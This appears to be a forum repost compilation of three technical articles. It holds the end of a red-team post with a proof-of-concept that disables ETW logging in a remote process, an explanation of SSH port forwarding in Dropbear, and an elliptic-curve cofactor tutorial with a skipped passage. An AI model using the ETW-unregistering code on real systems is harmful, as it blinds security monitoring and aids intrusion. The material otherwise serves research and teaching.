    PVOID                FilterData,
    PMCGEN_TRACE_CONTEXT CallbackContext)
{
    int cnt;

    // if we have a context
    if(CallbackContext) {
      // and control code is not zero
      if(IsEnabled) {
        // enable tracing?
        if(IsEnabled == EVENT_CONTROL_CODE_ENABLE_PROVIDER) {
          // set the context
          CallbackContext->MatchAnyKeyword = MatchAnyKeyword;
          CallbackContext->MatchAllKeyword = MatchAllKeyword;
          CallbackContext->Level           = Level;
          CallbackContext->IsEnabled       = 1;
          // ...other code omitted...
        }
      } else {
        // disable tracing
        CallbackContext->IsEnabled       = 0;
        CallbackContext->Level           = 0;
        CallbackContext->MatchAnyKeyword = 0;
        CallbackContext->MatchAllKeyword = 0;
        if(CallbackContext->EnableBitsCount > 0) {
          ZeroMemory(CallbackContext->EnableBitMask,
            4 * ((CallbackContext->EnableBitsCount - 1) / 32 + 1));
        }
      }
      EtwCallback(SourceId, IsEnabled, Level, MatchAnyKeyword,
        MatchAllKeyword, FilterData, CallbackContext);
    }
}

There are a number of options to disable CLR logging that don’t require patching code:

Invoke McGenControlCallbackV2 using EVENT_CONTROL_CODE_DISABLE_PROVIDER.
Directly modify the MCGEN_TRACE_CONTEXT and ETW registration structures to prevent further logging.
Invoke EventUnregister, passing in the registration handle.
The simplest way is passing the registration handle to ntdll!EtwEventUnregister. The following is just a PoC.

BOOL etw_disable(
    HANDLE hp,
    PRTL_BALANCED_NODE node,
    USHORT index)
{
    HMODULE               m;
    HANDLE                ht;
    RtlCreateUserThread_t pRtlCreateUserThread;
    CLIENT_ID             cid;
    NTSTATUS              nt = ~0UL;
    REGHANDLE             RegHandle;
    EventUnregister_t     pEtwEventUnregister;
    ULONG                 Result;

    // resolve address of API for creating new thread
    m = GetModuleHandle(L"ntdll.dll");
    pRtlCreateUserThread = (RtlCreateUserThread_t)
      GetProcAddress(m, "RtlCreateUserThread");

    // create registration handle
    RegHandle = (REGHANDLE)((ULONG64)node | (ULONG64)index << 48);
    pEtwEventUnregister = (EventUnregister_t)
      GetProcAddress(m, "EtwEventUnregister");

    // execute payload in remote process
    printf("  [ Executing EventUnregister in remote process.\n");
    nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL, NULL,
      pEtwEventUnregister, (PVOID)RegHandle, &ht, &cid);
    printf("  [ NTSTATUS is %lx\n", nt);
    WaitForSingleObject(ht, INFINITE);

    // read result of EtwEventUnregister
    GetExitCodeThread(ht, &Result);
    CloseHandle(ht);
    SetLastError(Result);

    if(Result != ERROR_SUCCESS) {
      xstrerror(L"etw_disable");
      return FALSE;
    }
    disabled_cnt++;
    return TRUE;
}

7. Further Research

I may have missed articles/tools on ETW. Feel free to email me with the details.

Tampering with Windows Event Tracing: Background, Offense, and Defense, by Matt Graeber
ModuleMonitor, by TheWover
SilkETW, by FuzzySec
ETW Explorer, by Pavel Yosifovich
EtwConsumerNT, by Petr Benes
ClrGuard, by Endgame
Detecting Malicious Use of .NET Part 1
Detecting Malicious Use of .NET Part 2
Hunting For In-Memory .NET Attacks
Detecting Fileless Malicious Behaviour of .NET C2 Agents using ETW
Make ETW Great Again.
Enumerating AppDomains in a remote process
ETW private loggers, EtwEventRegister on w8 consumer preview, EtwEventRegister, by redplait
Disable those pesky user mode etw loggers
Disable ETW of the current PowerShell session
Universally Evading Sysmon and ETW

Sursa: https://modexp.wordpress.com/2020/04/08/red-teams-etw/
-
How Does SSH Port Forwarding Work?

Apr 9, 2020
10 min read

I often use the command ssh server_addr -L localport:remoteaddr:remoteport to create an SSH tunnel. This allows me, for example, to communicate with a host that is only accessible to the SSH server. You can read more about SSH port forwarding (also known as “tunneling”) here; this blog post assumes that knowledge.

But what happens behind the scenes when the above-mentioned command is executed? What happens in the SSH client and server when they respond to this port-forwarding instruction? In this blog post, I’ll focus on the Dropbear SSH implementation and also stick to local (as opposed to remote) port forwarding. I am not describing my personal research process here, because there’s already enough information to share. Believe me.

TL;DR

This section summarizes the process without quoting any line of code. If you wish to understand how local port forwarding works in SSH, without going into any specific implementation, this section will suffice.

The client creates a socket and binds it to localaddr and localport (actually, it binds a socket for each address resolved from localaddr, but let’s keep things simple). If no localaddr is specified (which is usually the case for me), the client will create a socket for localhost or all network interfaces (implementation-dependent). listen() is called on the created, bound socket.

Once a connection is accepted on the socket, the client creates a channel with the socket’s file descriptor (fd) for reading and writing. Unlike sockets, channels are part of the SSH protocol and are not operating-system objects. The client then sends a message to the server, informing it of the new channel. The message includes the client’s channel identifier (index), the local address & port, and the remote address & port to which the server should connect later on.

When the server sees this special message, it creates a new channel.
It immediately “attaches” this channel to the client’s one, using the received identifier, and sends its own identifier to the client. This way, the two sides exchange channel IDs for future communication. Then, the server connects to the remote address and port which were specified in the client’s payload. If the connection succeeds, its socket is assigned to the server’s channel for both reading and writing.

Data is sent and received between the sides whenever select(), which is called from the session’s main loop, returns file descriptors (sockets) that are ready for I/O operations.

So just to make things clear: On the client side, a socket is connected to the local address; this is where data is read from (before sending to the server) or written to (after being received from the server). On the server side, there is another socket, connected to the remote address; this is where data is sent to (from the client) or received from (on its way to the client).

Drill-Down

What follows are the specific implementation details of the Dropbear SSH server and client. This part might be somewhat tedious, as it mentions many names of structs and functions, but it may help clarify steps from the TL;DR section and demonstrate them through code.

Important note on links: I don’t like blog posts containing too many links, because they give me really bad FOMO. Therefore, I decided not to link to the source code. Instead, I provide the code snippets that I find necessary, as well as the names of the different functions and structs.

Client Side

Setup

When the client reads the command line, it parses all forwarding “rules” and adds them to a list in cli_opts.localfwds.

void cli_getopts(int argc, char ** argv) {
    ...
    case 'L': // for the command-line flag "-L"
        opt = OPT_LOCALTCPFWD;
        break;
    ...
    if (opt == OPT_LOCALTCPFWD) {
        addforward(&argv[i][j], cli_opts.localfwds);
    }
    ...
}

In the client’s session loop, the function setup_localtcp() is called.
This function iterates over all TCP forwarding entries that were previously added and calls cli_localtcp() on each.

void setup_localtcp() {
    ...
    for (iter = cli_opts.localfwds->first; iter; iter = iter->next) {
        /* TCPFwdEntry is the struct that holds the forwarding details -
           local and remote addresses and ports */
        struct TCPFwdEntry * fwd = (struct TCPFwdEntry*)iter->item;
        ret = cli_localtcp(
                fwd->listenaddr,
                fwd->listenport,
                fwd->connectaddr,
                fwd->connectport);
    ...
}

The function cli_localtcp() creates a TCPListener entry. This entry specifies not only the forwarding details, but also the type of the channel that should be created (cli_chan_tcplocal) and the TCP type (direct). For each new TCP listener, it calls listen_tcpfwd().

static int cli_localtcp(const char* listenaddr,
        unsigned int listenport,
        const char* remoteaddr,
        unsigned int remoteport) {
    struct TCPListener* tcpinfo = NULL;
    int ret;

    tcpinfo = (struct TCPListener*)m_malloc(sizeof(struct TCPListener));

    /* Assign the listening address & port, and the remote address & port */
    tcpinfo->sendaddr = m_strdup(remoteaddr);
    tcpinfo->sendport = remoteport;
    if (listenaddr) {
        tcpinfo->listenaddr = m_strdup(listenaddr);
    } else {
        ...
        tcpinfo->listenaddr = m_strdup("localhost");
        ...
    }
    tcpinfo->listenport = listenport;

    /* Specify channel type and TCP type */
    tcpinfo->chantype = &cli_chan_tcplocal;
    tcpinfo->tcp_type = direct;

    ret = listen_tcpfwd(tcpinfo, NULL);
    ...
}

Creating a Socket

listen_tcpfwd() does the following:

calls dropbear_listen() to start listening on the local address and port. This is where sockets are actually created and bound to the client-provided address and port.
creates a new Listener object. This object contains the sockets on which listening should take place, and also specifies an “acceptor” - a callback function that is responsible for calling accept(). Each listener is constructed with the sockets that dropbear_listen() returned, and with an acceptor function named tcp_acceptor().
int listen_tcpfwd(struct TCPListener* tcpinfo, struct Listener **ret_listener) {
    char portstring[NI_MAXSERV];
    int socks[DROPBEAR_MAX_SOCKS];
    int nsocks;
    struct Listener *listener;
    char* errstring = NULL;

    snprintf(portstring, sizeof(portstring), "%u", tcpinfo->listenport);

    /* Create sockets and listen on them */
    nsocks = dropbear_listen(tcpinfo->listenaddr, portstring, socks,
            DROPBEAR_MAX_SOCKS, &errstring, &ses.maxfd);
    ...
    /* Put the list of sockets in a new Listener object */
    listener = new_listener(socks, nsocks, CHANNEL_ID_TCPFORWARDED,
            tcpinfo, tcp_acceptor, cleanup_tcp);
    ...
}

Creating a Channel

tcp_acceptor() is responsible for accepting connections to a socket. This is where the action happens. The function creates a new channel of type cli_chan_tcplocal (for local port forwarding), then calls send_msg_channel_open_init() to:

inform the server of the client’s newly-created channel;
tell it to create a channel of its own.

Once this CHANNEL_OPEN message is sent successfully, the client fetches the addresses and ports from the listener object and puts them inside the payload to be sent.

static void tcp_acceptor(const struct Listener *listener, int sock) {
    int fd;
    struct sockaddr_storage sa;
    socklen_t len;
    char ipstring[NI_MAXHOST], portstring[NI_MAXSERV];
    struct TCPListener *tcpinfo = (struct TCPListener*)(listener->typedata);

    len = sizeof(sa);
    fd = accept(sock, (struct sockaddr*)&sa, &len);
    ...
    if (send_msg_channel_open_init(fd, tcpinfo->chantype) == DROPBEAR_SUCCESS) {
        char* addr = NULL;
        unsigned int port = 0;

        if (tcpinfo->tcp_type == direct) {
            /* "direct-tcpip" */
            /* host to connect, port to connect */
            addr = tcpinfo->sendaddr;
            port = tcpinfo->sendport;
        }
        ...
        /* remote ip and port */
        buf_putstring(ses.writepayload, addr, strlen(addr));
        buf_putint(ses.writepayload, port);

        /* originator ip and port */
        buf_putstring(ses.writepayload, ipstring, strlen(ipstring));
        buf_putint(ses.writepayload, atol(portstring));
    }
}

Whenever the server responds with its own channel ID, the client will be able to send and receive data based on the specified forwarding rule.

Server Side

Creating a Channel (upon client’s request)

The server is informed of the local port forwarding only the moment it receives the MSG_CHANNEL_OPEN message from the client. Handling this message happens in the function recv_msg_channel_open(). This function creates a new channel of type svr_chan_tcpdirect and calls the channel initialization function, named newtcpdirect().

void recv_msg_channel_open() {
    ...
    /* get the packet contents */
    type = buf_getstring(ses.payload, &typelen);
    remotechan = buf_getint(ses.payload);
    ...
    /* The server finds out the type of the client's channel, to create
       a channel of the same type ("direct-tcpip") */
    for (cp = &ses.chantypes[0], chantype = (*cp);
         chantype != NULL;
         cp++, chantype = (*cp)) {
        if (strcmp(type, chantype->name) == 0) {
            break;
        }
    }

    /* create the channel */
    channel = newchannel(remotechan, chantype, transwindow, transmaxpacket);
    ...
    /* This is where newtcpdirect is called */
    if (channel->type->inithandler) {
        ret = channel->type->inithandler(channel);
        ...
    }
    ...
    send_msg_channel_open_confirmation(channel, channel->recvwindow,
            channel->recvmaxpacket);
    ...
}

Creating a Socket

The function newtcpdirect() reads the buffer ses.payload, which contains the data put there by the client beforehand: the destination host and port, and the origin host and port. With these details, the server connects to the remote host and port with connect_remote().

static int newtcpdirect(struct Channel * channel) {
    ...
    desthost = buf_getstring(ses.payload, &len);
    ...
    destport = buf_getint(ses.payload);
    orighost = buf_getstring(ses.payload, &len);
    ...
    origport = buf_getint(ses.payload);

    snprintf(portstring, sizeof(portstring), "%u", destport);
    /* Connect to the remote host */
    channel->conn_pending = connect_remote(desthost, portstring,
            channel_connect_done, channel, NULL, NULL);
    ...
}

This function creates a connection object c (of type dropbear_progress_connection) in which it stores the remote address and port, a “placeholder” socket fd (-1), and a callback function named channel_connect_done(). Remember this callback for later on!

struct dropbear_progress_connection *connect_remote(const char* remotehost,
        const char* remoteport, connect_callback cb, void* cb_data,
        const char* bind_address, const char* bind_port)
{
    struct dropbear_progress_connection *c = NULL;
    ...
    /* Populate the connection object */
    c = m_malloc(sizeof(*c));
    c->remotehost = m_strdup(remotehost);
    c->remoteport = m_strdup(remoteport);
    c->sock = -1;
    c->cb = cb;
    c->cb_data = cb_data;
    list_append(&ses.conn_pending, c);
    ...
    /* c->res contains addresses resolved from the remotehost & remoteport.
       This is a list of addresses, for each a socket is needed. */
    err = getaddrinfo(remotehost, remoteport, &hints, &c->res);
    if (err) {
        ...
    } else {
        c->res_iter = c->res;
    }
    ...
    return c;
}

As you can see in the snippet above, the connection structure is added to the list ses.conn_pending. This list will be handled in the next iteration of the session’s main loop. The connection itself is made from within the connect_try_next() function, which is called by set_connect_fds(). This is where the socket is practically connected to the remote host.

static void connect_try_next(struct dropbear_progress_connection *c) {
    struct addrinfo *r;
    int err;
    int res = 0;
    int fastopen = 0;
    ...
    for (r = c->res_iter; r; r = r->ai_next) {
        dropbear_assert(c->sock == -1);
        c->sock = socket(r->ai_family, r->ai_socktype, r->ai_protocol);
        ...
        if (!fastopen) {
            res = connect(c->sock, r->ai_addr, r->ai_addrlen);
        }
        ...
    }
    ...
}

Assigning the Socket to the Channel

The status of the connection to the remote host is checked in handle_connect_fds(), also called from the session loop. This is where, if the connection succeeded, its callback is invoked - remember our callback?
The callback function channel_connect_done() receives the socket and the channel itself (in the user_data parameter). The function sets the socket’s fd to be the channel’s source of reading and the destination of writing. With that, all I/O is done against the remote address. Finally, a confirmation message is sent back to the client with the channel identifier. void channel_connect_done(int result, int sock, void* user_data, const char* UNUSED(errstring)) { struct Channel *channel = user_data; if (result == DROPBEAR_SUCCESS) { channel->readfd = channel->writefd = sock; ... send_msg_channel_open_confirmation(channel, channel->recvwindow, channel->recvmaxpacket); ... } ... } From this point on, there’s a connection between the server’s channel and the client’s channel. On the client side, the channel reads from and writes to the socket connected to the local address. On the server side, the channel reads and writes against the remote address socket. Epilogue This type of write-up is pretty difficult to write, and even more so to read. So I’m glad you survived. If you have any questions regarding the port forwarding mechanism - please don’t hesitate to reach out and ask! I think the process can be quite confusing (at least it was for me) - and I’d love to know which parts need more sharpening. It is interesting to go further and understand the session loop itself: when are reading and writing triggered? How exactly are server-side and client-side channels paired? I figured if I went into these as well, this post would become a complete RFC explanation. So if you find these topics interesting, I encourage you to read the source code and get the answers. Sursa: https://ophirharpaz.github.io/posts/how-does-ssh-port-forwarding-work/
April 2020 Cofactor Explained: Clearing Elliptic Curves' dirty little secret Much of public key cryptography uses the notion of prime-order groups. We first relied on the difficulty of the Discrete Logarithm Problem. Problem was, Index Calculus makes DLP less difficult than it first seems. So we used longer and longer keys – up to 4096 bits (512 bytes) in 2020 – to keep up with increasingly efficient attacks. Elliptic curves solved that. A well chosen, safe curve can only be broken by brute force. In practice, elliptic curve keys can be as small as 32 bytes. On the other hand, elliptic curves were not exactly fast, and the maths involved many edge cases and subtle death traps. Most of those problems were addressed by Edwards curves, which have a complete addition law with no edge cases, and Montgomery curves, with a simple and fast scalar multiplication method. Those last curves however did introduce a tiny little problem: their order is not prime. (Before we dive in, be advised: this is a dense article. Don't hesitate to take the time you need to digest what you've just read and develop an intuitive understanding. Prior experience with elliptic curve scalar multiplication helps too.) Prime-order groups primer First things first: what's so great about prime-order groups? What's a group anyway? What does "order" even mean? A group is the combination of a set of elements "G", and an operation "+". The operation follows what we call the group laws. For all a and b in G, a+b is also in G (closure). For all a, b, and c in G, (a+b)+c = a+(b+c) (associativity). There's an element "0" such that for all a, 0+a = a+0 = a (identity element). For all a in G, there's an element -a such that a + -a = 0 (inverse element). Basically what you'd expect from good old addition. The order of a group is simply the number of elements in that group. To give you an example, let's take G = [0..15], and define + as binary exclusive or. All laws above can be checked.
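As a quick sanity check, all four laws can be verified exhaustively for this toy group with a few lines of Python (an illustrative sketch, not part of the original article):

```python
# Toy group from the text: G = {0..15}, with XOR as the "+" operation.
G = range(16)

for a in G:
    assert a ^ 0 == a and 0 ^ a == a           # identity element
    assert a ^ a == 0                          # each element is its own inverse
    for b in G:
        assert (a ^ b) in G                    # closure
        for c in G:
            assert (a ^ b) ^ c == a ^ (b ^ c)  # associativity
```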
Its order is 16 (there are 16 elements). Note some weird properties. For instance, each element is its own inverse (a xor a is zero). More interesting are cyclic groups, which have a generator: an element that, repeatedly added to itself, can walk through the entire group (and back to itself, so it can repeat the cycle all over again). Cyclic groups are all isomorphic to the group of non-negative integers modulo the same order. Let's take for instance [0..9], with addition modulo 10. The number 1 is a generator of the group: 1 = 1 2 = 1+1 3 = 1+1+1 4 = 1+1+1+1 5 = 1+1+1+1+1 6 = 1+1+1+1+1+1 7 = 1+1+1+1+1+1+1 8 = 1+1+1+1+1+1+1+1 9 = 1+1+1+1+1+1+1+1+1 0 = 1+1+1+1+1+1+1+1+1+1 1 = 1+1+1+1+1+1+1+1+1+1+1 (next cycle starts) 2 = 1+1+1+1+1+1+1+1+1+1+1+1 etc. Not all numbers are generators of the entire group. 5 for instance can generate only 2 elements: 0, and itself. 5 = 5 0 = 5+5 5 = 5+5+5 (next cycle starts) 0 = 5+5+5+5 etc. Note: we also use the word "order" to speak of how many elements are generated by a given element. In the group [0..9], 5 "has order 2", because it can generate 2 elements. 1, 3, 7, and 9 have order 10. 2, 4, 6, and 8 have order 5. 0 has order 1. Finally, prime-order groups are groups with a prime number of elements. They are all cyclic. What's great about them is their uniform structure: every element (except zero) can generate the whole group. Take for instance the group [0..10] (which has order 11). Every element except 0 is a generator: (Note: from now on, I will use the notation A.4 to denote A+A+A+A. This is called "scalar multiplication" (in this example, the group element is A and the scalar is 4). Since addition is associative, various tricks can speed up this scalar multiplication. I use a dot instead of "×" so we don't confuse it with ordinary multiplication, and as a reminder that the group element on the left of the dot is not necessarily a number.)
1.1 = 1 2.1 = 2 3.1 = 3 4.1 = 4 1.2 = 2 2.2 = 4 3.2 = 6 4.2 = 8 1.3 = 3 2.3 = 6 3.3 = 9 4.3 = 1 1.4 = 4 2.4 = 8 3.4 = 1 4.4 = 5 1.5 = 5 2.5 = 10 3.5 = 4 4.5 = 9 1.6 = 6 2.6 = 1 3.6 = 7 4.6 = 2 etc. 1.7 = 7 2.7 = 3 3.7 = 10 4.7 = 6 1.8 = 8 2.8 = 5 3.8 = 2 4.8 = 10 1.9 = 9 2.9 = 7 3.9 = 5 4.9 = 3 1.10 = 10 2.10 = 9 3.10 = 8 4.10 = 7 1.11 = 0 2.11 = 0 3.11 = 0 4.11 = 0 You get the idea. In practice, we can't distinguish group elements from each other: apart from zero, they all have the same properties. That's why discrete logarithm is so difficult: there is no structure to latch on to, so an attacker would mostly have to resort to brute force. (Okay, I lied. Natural numbers do have some structure to latch on to, which is why RSA keys need to be so damn huge. Elliptic curves – besides treacherous exceptions – don't have a known exploitable structure.) The cofactor So what we want is a group of order P, where P is a big honking prime. Unfortunately, the simplest and most efficient elliptic curves out there – those that can be expressed in Montgomery and Edwards form – don't give us that. Instead, they have order P×H, where P is suitably large, and H is a small number (often 4 or 8): the cofactor. Let's illustrate this with the cyclic group [0..43], of order 44. How much structure can we latch on to? 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 Since 44 is not prime, not all elements will have order 44. For instance: 1 has order 44 2 has order 22 3 has order 44 4 has order 11 … You get the idea. When we go over all numbers, we notice that the order of each element is not arbitrary. It is either 1, 2, 4, 11, 22, or 44. Note that 44 = 11 × 2 × 2. We can see where the various orders come from: 1, 2, 2×2, 11, 11×2, 11×2×2. The order of an element is easy to test: just multiply by the order you want to test, and see if it yields zero.
For instance (remember A.4 is a short hand for A+A+A+A, and we're working modulo 44 – the order of the group): 8 . 11 = 0 -- prime order 24 . 11 = 0 -- prime order 25 . 11 = 11 -- not prime order 11 . 4 = 0 -- low order 33 . 4 = 0 -- low order 25 . 4 = 12 -- not low order ("Low order" means orders below 11: 1, 2, 4. Not much lower than 11, but if we replace 11 by a large prime P, the term "low order" makes more sense.) Understandably, there are only a few elements of low order: 0, 11, 22, and 33. 0 has order 1, 22 has order 2, 11 and 33 have order 4. Like the column on the left, they form a proper subgroup. It's easier to see by swapping and rotating the columns a bit:
To look up, we follow the same reasoning, except this time, our scalar s must follow these equations: s = 0 mod 11 -- absorb a s = 1 mod 4 -- preserve b That's 33. For instance: 13.33 = 33 27.33 = 11 42.33 = 22 Now we can look up as well. (Note: This "looking up" and "looking left" terminology isn't established mathematical terminology, but rather a hopefully helpful illustration. Do not ask established mathematicians or cryptographers about "looking up" and "looking left" without expecting them to be at least somewhat confused.) Torsion safe representatives We now have an easy way to project elements in the prime-order subgroup. Just look left by multiplying the element by the appropriate scalar (in the case of our [0..43] group, that's 12). That lets us treat each line of the rectangle as an equivalence class, with one canonical representative: the leftmost element – the one that is on the prime-order subgroup. This effectively gets us what we want: a prime-order group. Let's say we have a scalar s and an element E, which are not guaranteed to be on the prime-order subgroup. We want to know in which line their scalar multiplication will land, and we want to represent that line by its leftmost element. To do so, we just need to perform the scalar multiplication, then look left. For instance: s = 7 -- some random scalar E = 31 -- some random point E.s = 41 result = (E.s).12 = 8 Or we could first project E to the left, then perform the scalar multiplication. It will stay on the left column, and give us the same result: E = 31 E . 12 = 20 result = (E.12).s = 8 The problem with this approach is that it is slow. We're performing two scalar multiplications instead of just one. That kind of defeats the purpose of choosing a fast curve to begin with. We need something better. Let us look at our result one more time: result = (E.s).12 = 8 result = (E.12).s = 8 It would seem the order in which we do the scalar multiplications does not matter. 
Indeed, the associativity of group addition means we can rely on the following: (E.s).t = E.(s×t) = E.(t×s) = (E.t).s Now you can see that we can avoid performing two scalar multiplications, and multiply the two scalars instead. To go back to our example: s = 7 -- our random scalar E = 31 -- our random point result = E.(7×12) -- scalarmult and look left result = E.(84) result = E.(40) -- because 84 % 44 = 40 result = 8 Remember we are working with a cyclic group of order 44: adding an element to itself 84 times is like adding it to itself 44 times (the result is zero), and again 40 times. So better reduce the scalar modulo the group order so we can have a cheaper scalar multiplication. Let's recap: s = 7 -- our random scalar E = 31 -- our random point E.s = 41 E.(s×12) = 8 41 and 8 are on the same line, and 8 is in the prime-order subgroup. Multiplying by s×12 instead of s preserved the main factor, and cleared the cofactor. Because of this, we call s×12 the torsion safe representative of s. Now computing (s×12) % 44 may be simple, but it doesn't look very cheap. Thankfully, we're not out of performance tricks: (s×12) % 44 = (s×(11+1)) % 44 = (s + (s × 11)) % 44 = s + (s × 11) % 44 -- we assume s < 11 = s + (s%4 × 11) -- we can remove %44 We only need to add s and a multiple of 11 (0, 11, 2×11, or 3×11). The result is guaranteed to be under the group order (44). The total cost is: Multiplying the prime order by a small number. Adding two scalars together. Compared to the scalar multiplication, that's practically free. Decoupling main factor and cofactor We just found the torsion safe representative of a scalar: one that, after scalar multiplication, preserves the line, and only chooses the left column. In some cases, we may want to reverse roles: preserve the column, and only choose the top line. In other words, we want to do the equivalent of performing the scalar multiplication, then looking up.
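None of the torsion-safe-representative arithmetic above needs to be taken on faith; a short Python sketch (illustrative, using the text's toy group mod 44) replays the example and checks the cheap formula for every scalar below the prime order:

```python
# Toy group of order 44 = 4 * 11 (cofactor H = 4, prime factor P = 11).
N, P, H = 44, 11, 4

def torsion_safe(s):
    """Cheap version of (s * 12) % 44: add s and a multiple of 11 (assumes s < 11)."""
    return s + (s % H) * P

s, E = 7, 31                           # the text's random scalar and point
assert (E * s) % N == 41               # E.s
assert (E * ((s * 12) % N)) % N == 8   # E.(s*12): cofactor cleared, left column
assert torsion_safe(s) == 40 == (s * 12) % N

# The cheap formula matches modular multiplication by 12 for all s < 11.
for s in range(P):
    assert torsion_safe(s) == (s * 12) % N
```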
The reasoning is the same as for torsion safe representatives, only flipped on its head. Instead of multiplying our scalar by 12 (which is a multiple of the low order, equals 1 modulo the prime order), we want to multiply it by 33: a multiple of the prime order, which equals 1 modulo the low order. Again, modular multiplication by 33 is not cheap, so we repeat our performance trick: (s×33) % 44 = (s×11×3) % (11×4) = ((s×3) % 4) × 11 In this case, we just have to compute (s×3) % 4 and multiply the prime order by that small number. The total cost is just the multiplication of the order by a very small number. Now we can do the decoupling: s = 7 -- some random scalar E = 31 -- some random point E.s = 41 -- normal result E.(s×12) = 8 E.(s×33) = 33 E.s = 8 + 33 = 41 -- decoupled result Cofactor and discrete logarithm Time to start applying our knowledge. Let's say I have elements A and B, and a scalar s such that B = A.s. The discrete logarithm problem is about finding s when you already know A and B. If we're working in a prime-order group with a sufficiently big prime, that problem is intractable. But we're not working with a prime-order group. We have a cofactor to deal with. Let's go back to our group of order 44: 0 11 22 33 4 15 26 37 8 19 30 41 12 23 34 1 16 27 38 5 20 31 42 9 24 35 2 13 28 39 6 17 32 43 10 21 36 3 14 25 40 7 18 29 We can easily recover the line and the column of A and B, so let's do that. Take for instance A = 27 and B = 15. Now let's find s. A = 27 A = 16 + 11 A = 4.4 + 11.1 B = 15 B = 4 + 11 B = 4.1 + 11.1 B = A . s 4.1 + 11.1 = (4.4 + 11.1) . s 4.1 + 11.1 = (4.4).s + (11.1).s 4 .1 = (4 .4).s 11.1 = (11.1).s Now look at that last line. Since 11 has only order 4, there are only 4 possible solutions, which are easy to brute force. We can try them all and easily see that: 11 . 1 = (11.1).1 (mod 44) s mod 4 = 1 The other equation however is more of a problem. There are 11 possible solutions, and trying them all is more expensive: 4 . 
1 ≠ (4.4).1 4 . 1 ≠ (4.4).2 4 . 1 = (4.4).3 s mod 11 = 3 Now that we know both moduli, we can deduce that s = 25: A . s = B 27.25 = 15 What we just did here is reduce the discrete logarithm into two easier discrete logarithms. Such divide and conquer is the reason why we want prime-order groups, where the difficulty of the discrete logarithm is the square root of the prime order (square root because there are cleverer brute force methods than just trying all possibilities). Here however, the difficulty wasn't the square root of 44. It was sqrt(11) + sqrt(2) + sqrt(2), which is significantly lower. The elliptic curves we are interested in however have much bigger orders. Curve25519 for instance has order 8 × L where L is 2²⁵² + something (and the cofactor is 8). So the difficulty of solving discrete logarithm for Curve25519 is sqrt(2)×3 + sqrt(2²⁵²), or approximately 2¹²⁶. Still lower than sqrt(8×L) (about 2¹²⁷), but not low enough to be worrying: discrete logarithm is still intractable. Cofactor and X25519 Elliptic curves can have a small cofactor, and still guarantee we can't solve discrete logarithm. There's still a problem however: the attacker can still solve the easy half of discrete logarithm, and deduce the value of s, modulo the cofactor. In the case of Curve25519, that means 3 bits of information, that could be read, or even controlled by the attacker. That's not ideal, so DJB rolled two tricks up his sleeve: The chosen base point of the curve has order L, not 8×L. Multiplying that point by our secret scalar can then only generate points on the prime-order subgroup (the leftmost column). The three bits of information the attacker could have had are just absorbed by that base point. The scalar is clamped. Bit 255 is cleared and bit 254 is set to prevent timing leaks in poor implementations, and put a lower bound on standard attacks. More importantly, bits 0, 1, and 2 are cleared, to make sure the scalar is a multiple of 8.
This guarantees that the low order component of the point, if any, will be absorbed by the scalar multiplication, such that the resulting point will be on the prime-order subgroup. The second trick is especially important: it guarantees that the scalar multiplication between your secret key and an attacker controlled point on the curve can only yield two kinds of results: A point on the curve, that has prime order. The attacker doesn't learn anything about your private key (at least not without solving discrete logarithm first), and they can't control which point on the curve you are computing. We're good. Zero. Okay, the attacker did manage to force this output, but this only (and always) happens when they gave you a low order point. So again, they learned nothing about your private key. And if you needed to check for low order output (some protocols, like CPace, require this check), you only need to make sure it's not zero (use a constant-time comparison, please). (I'm ignoring what happens if the point you're multiplying is not on the curve. Failing to account for that has broken systems in the past. X25519 however only transmits the x-coordinate of the point, so the worst you can have is a point on the "twist". Since the twist of Curve25519 also has a big prime order (2²⁵³ minus something) and a small cofactor (4), the results will be similar, and the attacker will learn nothing. Curve25519 is thus "twist secure".) Cofactor and Elligator Elligator was developed to help with censorship circumvention. It encodes points on the curve so that if the point is selected at random, its encoding will be indistinguishable from random. With that tool, the entire cryptographic communication is fully random, including initial ephemeral keys. This enables the construction of fully random formats, and facilitates steganography. Communication protocols often require ephemeral keys to initiate communications.
In practice, they need to generate a random key pair, and send the public half over the network. Public keys however will not necessarily look random, even though the private half was indeed random. Curve25519 for instance has a number of biases: Curve25519 points are encoded in 255 bits (we only encode the x-coordinate). Since all communication happens at the byte level, there is one unused bit, which is usually cleared. This is easily remedied by simply randomising the unused bit. The x-coordinate of Curve25519 points does not span all values from 0 to 2²⁵⁵-1. Values 2²⁵⁵-19 and above never occur. In practice though, this bias is small enough to be utterly undetectable. Curve25519 points satisfy the equation y² = x³ + 486662 x² + x. All the attacker has to do is take the suspected x-coordinate, compute the right hand side of the equation, and check whether this is a square in the finite field GF(2²⁵⁵-19). For random strings, it will be about half the time. If it is a Curve25519 x-coordinate, it will be all the time. The remedy is Elligator mappings, which can decode all numbers from 0 to 2²⁵⁵-20 into a point on the curve. Encoding fails about half the time, but we can try generating key pairs until we find one that can be turned into a random looking encoding. X25519 keys aren't selected at random to begin with: because of cofactor clearing, they are taken from the prime-order subgroup. Even with Elligator mappings, an attacker can decode the point, and check whether it belongs to the prime-order subgroup. Again, with X25519, this would happen all the time, unlike random representatives. When I first discovered this problem, I didn't know what to do. The remedy is fairly simple once I understood the cofactor. The real problem was reaching that understanding. So, our problem is to generate a key pair, where the public half is a random point on the whole curve, not just the prime-order subgroup.
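The third bias is easy to reproduce: Euler's criterion tells us whether the right hand side of the curve equation is a square in GF(2²⁵⁵-19), using nothing but Python's built-in big integers. This is an illustrative sketch of the distinguisher only, not an Elligator implementation:

```python
import random

p = 2**255 - 19
A = 486662          # Curve25519: y^2 = x^3 + A*x^2 + x

def looks_like_curve_point(x):
    """True when x^3 + A*x^2 + x is a square mod p (Euler's criterion)."""
    v = (x**3 + A * x**2 + x) % p
    return v == 0 or pow(v, (p - 1) // 2, p) == 1

assert looks_like_curve_point(9)    # x-coordinate of the standard base point

# Random candidates pass the test only about half the time -- exactly the
# statistical tell that Elligator representatives are designed to remove.
random.seed(1)
hits = sum(looks_like_curve_point(random.randrange(p)) for _ in range(200))
assert 60 < hits < 140
```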
